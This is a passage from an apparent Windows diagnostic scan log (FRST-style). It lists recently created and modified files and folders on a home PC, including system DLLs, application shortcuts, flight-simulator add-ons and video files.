2016-09-29 15:12 - 2016-09-15 09:27 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-09-29 15:12 - 2016-09-15 09:27 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL
2016-09-29 15:12 - 2016-09-15 09:25 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-09-29 15:12 - 2016-09-15 09:25 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-09-29 15:12 - 2016-09-15 09:24 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2016-09-29 15:12 - 2016-09-15 09:24 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-09-29 15:12 - 2016-09-15 09:24 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2016-09-29 15:12 - 2016-09-15 09:24 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2016-09-29 15:12 - 2016-09-15 09:24 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-09-29 15:12 - 2016-09-15 09:23 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2016-09-29 15:12 - 2016-09-15 09:23 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2016-09-29 15:12 - 2016-09-15 09:22 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2016-09-29 15:12 - 2016-09-15 09:20 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-09-29 15:12 - 2016-09-15 09:19 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2016-09-29 15:12 - 2016-09-15 09:17 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-09-29 15:12 - 2016-09-15 09:16 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-09-29 15:12 - 2016-09-15 09:16 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2016-09-29 15:12 - 2016-08-05 20:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll
2016-09-29 15:03 - 2016-10-17 21:03 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\777
2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Captain Sim
2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Captain Sim
2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\Flight Simulator X Files
2016-09-26 05:41 - 2016-10-16 12:20 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\qBittorrent
2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\qBittorrent
2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\Program Files (x86)\qBittorrent
2016-09-25 21:56 - 2016-09-25 21:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Universal Extractor
2016-09-25 21:56 - 2016-09-25 21:56 - 00000000 ____D C:\Program Files (x86)\Universal Extractor
2016-09-25 20:48 - 2016-10-19 14:55 - 00000000 ____D C:\ProgramData\Gramblr
2016-09-25 20:48 - 2016-10-18 19:40 - 00001015 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gramblr.lnk
2016-09-25 20:48 - 2016-10-13 14:48 - 00000000 ____D C:\Program Files\Gramblr
2016-09-25 19:12 - 2016-09-25 19:12 - 00000040 ___SH C:\WINDOWS\cnerolf.bin
2016-09-25 09:49 - 2016-09-25 09:49 - 00334616 _____ (Microsoft Corporation) C:\WINDOWS\system32\concrt140.dll
2016-09-25 09:49 - 2016-09-25 09:49 - 00089328 _____ (Microsoft Corporation) C:\WINDOWS\system32\vcruntime140.dll
2016-09-25 09:49 - 2016-09-25 09:49 - 00085744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vcruntime140.dll
2016-09-25 09:46 - 2016-09-25 09:46 - 00639728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp140.dll
2016-09-25 09:46 - 2016-09-25 09:46 - 00244504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\concrt140.dll
2016-09-25 09:45 - 2016-09-25 09:45 - 00443632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp140.dll
2016-09-25 09:45 - 2016-09-25 09:45 - 00394496 _____ (Microsoft Corporation) C:\WINDOWS\system32\vccorlib140.dll
2016-09-25 09:45 - 2016-09-25 09:45 - 00271104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vccorlib140.dll
2016-09-24 20:36 - 2016-09-24 20:31 - 4282296952 _____ C:\Users\Kyle Aniel\Desktop\MVI_0072.MOV
2016-09-24 20:36 - 2016-09-24 19:43 - 721691356 _____ C:\Users\Kyle Aniel\Desktop\MVI_0071.MOV
2016-09-24 20:36 - 2016-09-24 19:40 - 164218400 _____ C:\Users\Kyle Aniel\Desktop\MVI_0070.MOV
2016-09-24 20:33 - 2016-09-24 20:28 - 1372618752 _____ C:\Users\Kyle Aniel\Desktop\00095.MTS
2016-09-24 20:32 - 2016-09-24 20:11 - 2080210944 _____ C:\Users\Kyle Aniel\Desktop\00094.MTS
2016-09-24 20:32 - 2016-09-24 19:22 - 385056768 _____ C:\Users\Kyle Aniel\Desktop\00093.MTS
2016-09-24 20:32 - 2016-09-24 19:19 - 140378112 _____ C:\Users\Kyle Aniel\Desktop\00092.MTS
2016-09-24 15:27 - 2016-09-24 15:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CaptainSim 757-200 PRO
2016-09-24 15:27 - 2016-09-24 15:27 - 00000000 ____D C:\Program Files\Microsoft Games
2016-09-20 19:47 - 2016-09-20 19:47 - 00002507 _____ C:\Users\Kyle Aniel\Desktop\Safari.lnk
2016-09-20 19:41 - 2016-10-18 19:40 - 00000726 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 10 Upgrade Assistant.lnk
2016-09-20 19:41 - 2016-10-18 19:38 - 00000726 _____ C:\Users\banie_000\Desktop\Windows 10 Upgrade Assistant.lnk
2016-09-20 19:41 - 2016-09-20 19:41 - 00000000 ____D C:\Windows10Upgrade

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 14:44 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-10-19 14:43 - 2016-07-16 04:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-10-19 14:40 - 2015-02-18 13:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Verizon
2016-10-19 14:39 - 2016-08-13 13:16 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Spotify
2016-10-19 14:38 - 2016-08-13 13:17 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Spotify
2016-10-19 14:37 - 2014-11-01 19:56 - 00000000 __SHD C:\Users\Kyle Aniel\IntelGraphicsProfiles
2016-10-19 14:36 - 2016-09-16 04:12 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-10-19 14:36 - 2016-08-13 16:35 - 00000000 ____D C:\ProgramData\boost_interprocess
2016-10-19 14:35 - 2016-09-16 04:53 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-10-19 14:35 - 2016-09-16 04:09 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-10-19 06:56 - 2015-07-19 18:37 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Audacity
2016-10-19 05:01 - 2016-09-16 04:16 - 00000000 ____D C:\Users\Kyle Aniel
2016-10-18 23:55 - 2016-07-16 04:45 - 00000000 ____D C:\WINDOWS\INF
2016-10-18 23:53 - 2015-12-25 22:04 - 1317578402 _____ C:\WINDOWS\MEMORY.DMP
2016-10-18 20:55 - 2015-11-30 04:58 - 01824812 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-10-18 20:26 - 2015-10-05 15:21 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
2016-10-18 19:54 - 2014-11-02 17:43 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Adobe
2016-10-18 19:51 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\addins
2016-10-18 19:40 - 2016-09-18 07:21 - 00002222 _____ C:\Users\Public\Desktop\Google Earth.lnk
2016-10-18 19:40 - 2016-09-16 04:35 - 00001564 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-10-18 19:40 - 2016-09-10 16:54 - 00002236 _____ C:\Users\Public\Desktop\Style Builder 2016.lnk
2016-10-18 19:40 - 2016-09-10 16:54 - 00002150 _____ C:\Users\Public\Desktop\LayOut 2016.lnk
2016-10-18 19:40 - 2016-09-10 16:54 - 00002061 _____ C:\Users\Public\Desktop\SketchUp 2016.lnk
2016-10-18 19:40 - 2016-09-04 15:17 - 00001310 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk
2016-10-18 19:40 - 2016-09-04 15:13 - 00001416 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Character Animator (Preview).lnk
2016-10-18 19:40 - 2016-09-04 14:16 - 00001610 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Application Manager.lnk
2016-10-18 19:40 - 2016-09-04 14:16 - 00001604 _____ C:\Users\Public\Desktop\Adobe Application Manager.lnk
2016-10-18 19:40 - 2016-08-04 19:11 - 00002653 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditVoicepack X.lnk
2016-10-18 19:40 - 2016-07-29 22:39 - 00000978 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk
2016-10-18 19:40 - 2016-07-12 12:13 - 00002507 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk
2016-10-18 19:40 - 2016-07-12 12:13 - 00002501 _____ C:\Users\Public\Desktop\Safari.lnk
2016-10-18 19:40 - 2016-06-08 08:09 - 00000957 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\paint.net.lnk
2016-10-18 19:40 - 2016-06-08 08:09 - 00000951 _____ C:\Users\Public\Desktop\paint.net.lnk
2016-10-18 19:40 - 2016-05-07 07:07 - 00001045 _____ C:\Users\Public\Desktop\WinRAR.lnk
2016-10-18 19:40 - 2016-05-06 20:00 - 00001092 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenShot Video Editor.lnk
2016-10-18 19:40 - 2016-04-07 19:48 - 00001823 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-10-18 19:40 - 2016-03-11 22:17 - 00002615 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SBACSecureBrowser.lnk
2016-10-18 19:40 - 2016-03-11 22:17 - 00002609 _____ C:\Users\Public\Desktop\SBACSecureBrowser.lnk
2016-10-18 19:40 - 2016-02-13 07:26 - 00001223 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-10-18 19:40 - 2016-02-13 07:26 - 00001217 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-10-18 19:40 - 2015-12-29 13:47 - 00002267 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-10-18 19:40 - 2015-12-29 13:47 - 00002261 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-10-18 19:40 - 2015-12-28 22:04 - 00001083 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk
2016-10-18 19:40 - 2015-12-28 22:04 - 00001077 _____ C:\Users\Public\Desktop\Audacity.lnk
2016-10-18 19:40 - 2015-12-09 20:31 - 00000908 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-10-18 19:40 - 2015-12-06 16:24 - 00001977 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Synthesia.lnk
2016-10-18 19:40 - 2015-12-06 16:24 - 00001971 _____ C:\Users\Public\Desktop\Synthesia.lnk
2016-10-18 19:40 - 2015-11-21 10:00 - 00002607 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CASecureBrowser.lnk
2016-10-18 19:40 - 2015-10-24 17:16 - 00002488 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2016-10-18 19:40 - 2015-10-24 17:16 - 00002487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2016-10-18 19:40 - 2015-10-24 17:16 - 00002450 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2016-10-18 19:40 - 2015-10-24 17:16 - 00002430 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2016-10-18 19:40 - 2015-09-21 13:38 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-10-18 19:40 - 2015-09-21 13:38 - 00002125 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2016-10-18 19:40 - 2015-07-24 07:52 - 00001869 _____ C:\Users\Public\Desktop\McAfee Security Center.lnk
2016-10-18 19:40 - 2015-02-18 01:10 - 00001098 _____ C:\Users\Public\Desktop\Vz  In-Home Agent.lnk
2016-10-18 19:40 - 2015-02-01 21:00 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-10-18 19:40 - 2014-11-01 17:50 - 00002497 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Messenger.lnk
2016-10-18 19:40 - 2014-11-01 17:50 - 00001469 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Mail.lnk
2016-10-18 19:40 - 2014-11-01 17:50 - 00001385 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk
2016-10-18 19:40 - 2014-11-01 17:50 - 00001316 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
2016-10-18 19:38 - 2016-09-02 21:36 - 00001164 _____ C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IcoFX 2.lnk
2016-10-18 19:38 - 2016-08-22 18:30 - 00001107 _____ C:\Users\banie_000\Desktop\MidiEditor.lnk
2016-10-18 19:38 - 2016-08-13 15:12 - 00002196 _____ C:\Users\banie_000\Desktop\Wirecast.lnk
2016-10-18 19:38 - 2016-08-05 10:52 - 00001326 _____ C:\Users\banie_000\Desktop\Voice Changer 9.0 Diamond.lnk
2016-10-18 19:38 - 2016-07-29 23:31 - 00001933 _____ C:\Users\banie_000\Desktop\ADE 170.lnk
2016-10-18 19:38 - 2016-07-20 12:20 - 00002056 _____ C:\Users\banie_000\Desktop\767-300 FSX Configuration Manager.lnk
2016-10-18 19:38 - 2016-07-05 19:10 - 00001011 _____ C:\Users\banie_000\Desktop\Open Broadcaster Software.lnk
2016-10-18 19:38 - 2016-06-08 08:03 - 00001985 _____ C:\Users\banie_000\Desktop\DXTBmp.lnk
2016-10-18 19:38 - 2015-11-13 21:32 - 00001291 _____ C:\Users\banie_000\Desktop\video-editor_setup_full1107(1).exe.lnk
2016-10-18 19:38 - 2015-11-13 20:43 - 00001301 _____ C:\Users\banie_000\Desktop\video-editor-idco_setup_full1107.exe.lnk
2016-10-18 19:38 - 2015-11-13 20:00 - 00001276 _____ C:\Users\banie_000\Desktop\video-editor_setup_full1107.exe.lnk
2016-10-18 19:38 - 2015-08-29 09:54 - 00002391 _____ C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-10-18 18:35 - 2016-08-16 13:16 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Flight Simulator X Files
2016-10-18 18:35 - 2016-08-04 21:03 - 00000000 ____D C:\Program Files (x86)\FS Recorder for FSX
2016-10-18 14:47 - 2016-09-16 04:16 - 00000000 ____D C:\Users\banie_000
2016-10-17 17:29 - 2016-04-05 18:54 - 00000000 ____D C:\ProgramData\BlueStacksSetup
2016-10-17 15:23 - 2016-07-16 04:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-10-16 22:25 - 2016-09-04 15:19 - 00001531 _____ C:\Users\Kyle Aniel\Desktop\AfterFX.exe - Shortcut.lnk
2016-10-16 22:25 - 2016-08-28 12:55 - 00002885 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Flight Simulator X.lnk
2016-10-16 22:25 - 2016-07-15 20:52 - 00001164 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Expression Encoder 4.lnk
2016-10-16 22:25 - 2016-07-15 20:51 - 00001201 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Expression Encoder 4 Screen Capture.lnk
2016-10-16 22:25 - 2016-07-05 10:26 - 00001255 _____ C:\Users\Kyle Aniel\Desktop\HitFilm 4 Express.lnk
2016-10-16 22:25 - 2016-03-15 16:32 - 00001521 _____ C:\Users\Kyle Aniel\Desktop\DVDMaker.lnk
2016-10-16 22:25 - 2015-12-09 20:39 - 00001892 _____ C:\Users\Kyle Aniel\Desktop\PowerPoint 2016.lnk
2016-10-16 22:25 - 2015-12-09 20:39 - 00001877 _____ C:\Users\Kyle Aniel\Desktop\Word 2016.lnk
2016-10-16 16:58 - 2016-07-16 04:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-10-16 16:57 - 2014-07-16 23:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-10-16 06:22 - 2014-12-07 21:10 - 00000364 _____ C:\WINDOWS\Tasks\HPCeeScheduleForKYLE-PC$.job
2016-10-15 19:02 - 2015-05-01 14:58 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Screencast-O-Matic
2016-10-15 17:03 - 2014-12-22 16:56 - 00000000 ____D C:\Users\Kyle Aniel\.VirtualBox
2016-10-15 17:01 - 2015-01-10 11:00 - 00000000 ____D C:\Users\Kyle Aniel\VirtualBox VMs
2016-10-15 08:13 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\rescache
2016-10-14 23:19 - 2016-02-03 21:37 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Kyle Laptop 2-3-16
2016-10-14 19:06 - 2014-11-01 19:52 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-10-14 19:03 - 2016-09-16 04:09 - 04981224 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs
2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\migwiz
2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-10-13 21:06 - 2016-02-09 18:34 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Sound recordings
2016-10-13 17:02 - 2016-07-29 22:40 - 00000000 ____D C:\Users\Kyle Aniel\.gimp-2.8
2016-10-13 16:53 - 2015-12-24 21:16 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons
2016-10-13 15:53 - 2014-11-06 00:12 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-10-13 15:40 - 2014-11-06 00:12 - 143495576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-10-13 15:07 - 2016-07-16 04:43 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2016-10-13 15:07 - 2016-07-16 04:42 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2016-10-13 14:47 - 2014-11-02 17:45 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-10-11 21:24 - 2016-02-09 17:13 - 00000000 ____D C:\Users\Kyle Aniel\Documents\MultitrackStudio Songs
2016-10-11 19:55 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-10-11 19:55 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-10-09 22:12 - 2016-07-29 22:43 - 00000000 ____D C:\Users\Kyle Aniel\.thumbnails
2016-10-07 21:33 - 2016-07-16 04:43 - 00471040 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2016-10-07 21:33 - 2016-07-16 04:43 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2016-10-07 21:33 - 2016-07-16 04:43 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2016-10-07 21:33 - 2016-07-16 04:43 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2016-10-07 21:33 - 2016-07-16 04:43 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2016-10-07 06:11 - 2014-11-01 19:56 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Packages
2016-10-06 18:03 - 2016-08-15 22:26 - 11087548 _____ C:\Users\Kyle Aniel\Desktop\B737_800.cab
2016-10-05 18:12 - 2016-07-16 04:47 - 00000000 __RHD C:\Users\Public\Libraries
2016-10-05 17:59 - 2016-04-05 18:57 - 00000000 ____D C:\Users\banie_000\AppData\Local\BlueStacks
2016-10-04 19:44 - 2016-09-16 05:08 - 00000000 ___DC C:\WINDOWS\Panther
2016-10-04 19:44 - 2016-09-16 05:02 - 00032216 _____ C:\WINDOWS\diagwrn.xml
2016-10-04 19:44 - 2016-09-16 05:02 - 00026570 _____ C:\WINDOWS\diagerr.xml
2016-10-03 19:51 - 2014-11-01 15:59 - 00000000 ____D C:\Program Files (x86)\Google
2016-10-03 13:09 - 2016-07-16 04:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-10-03 13:09 - 2016-07-16 04:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-10-02 20:57 - 2016-06-08 08:09 - 00000000 ___DC C:\Program Files\Staging
2016-10-01 15:44 - 2016-08-02 17:23 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\EZCA
2016-10-01 12:48 - 2016-08-21 20:28 - 00000000 ____D C:\Program Files (x86)\EZCA
2016-10-01 07:59 - 2016-08-13 17:40 - 00000000 ____D C:\ProgramData\Esellerate
2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\setup
2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\Provisioning
2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-09-24 17:41 - 2016-08-02 17:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EZCA
2016-09-19 20:09 - 2014-07-16 23:40 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information

==================== Files in the root of some directories =======

2005-11-27 00:53 - 2005-11-27 00:53 - 0049152 _____ ( ) C:\Program Files\Interop.WIA.dll
2013-08-25 18:57 - 2013-08-25 18:57 - 0001968 _____ () C:\Program Files\License.txt
2016-09-12 14:54 - 2016-09-12 14:54 - 1703120 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Base.dll
2016-09-12 14:54 - 2016-09-12 14:54 - 3425792 ____C () C:\Program Files\PaintDotNet.Base.pdb
2016-09-12 14:55 - 2016-09-12 14:55 - 0638160 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Core.dll
2016-09-12 14:55 - 2016-09-12 14:55 - 2088448 ____C () C:\Program Files\PaintDotNet.Core.pdb
2016-09-12 14:55 - 2016-09-12 14:55 - 0086736 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Data.dll
2016-09-12 14:55 - 2016-09-12 14:55 - 0259584 ____C () C:\Program Files\PaintDotNet.Data.pdb
2016-09-12 14:55 - 2016-09-12 14:55 - 0191184 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Effects.dll
2016-09-12 14:55 - 2016-09-12 14:55 - 0488960 ____C () C:\Program Files\PaintDotNet.Effects.pdb
2016-09-12 14:55 - 2016-09-12 14:55 - 1764560 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.exe
2016-06-28 11:34 - 2016-06-28 11:34 - 0000534 _____ () C:\Program Files\PaintDotNet.exe.config
2016-09-12 14:55 - 2016-09-12 14:55 - 0333520 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Framework.dll
2016-09-12 14:55 - 2016-09-12 14:55 - 1152512 ____C () C:\Program Files\PaintDotNet.Framework.pdb
2016-09-12 14:55 - 2016-09-12 14:55 - 4308480 ____C () C:\Program Files\PaintDotNet.pdb
2016-09-12 14:55 - 2016-09-12 14:55 - 0414928 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Resources.dll
2016-09-12 14:55 - 2016-09-12 14:55 - 0048640 ____C () C:\Program Files\PaintDotNet.Resources.pdb
2016-09-03 11:06 - 2016-09-03 11:06 - 0146082 ____R () C:\Program Files\PaintDotNet.Strings.3.cs.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0141848 ____R () C:\Program Files\PaintDotNet.Strings.3.da.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0147862 ____R () C:\Program Files\PaintDotNet.Strings.3.DE.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0147219 ____R () C:\Program Files\PaintDotNet.Strings.3.ES.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0158943 ____R () C:\Program Files\PaintDotNet.Strings.3.fa.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0140908 ____R () C:\Program Files\PaintDotNet.Strings.3.fi.resources
2016-09-03 11:06 - 2016-09-03 11:06 - 0149616 ____R () C:\Program Files\PaintDotNet.Strings.3.FR.resources
